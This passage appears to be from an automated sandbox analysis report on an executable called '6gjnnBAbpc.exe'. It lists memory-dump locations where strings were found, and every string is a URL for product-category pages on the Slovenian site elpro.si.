                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/din-en-301-489/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-12830/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-13060/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-285/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/fcm-ec-1935-2004/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-11140-4/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-15883/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-17665/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-461f/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-810g/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/sist-en-60529/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/digita
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 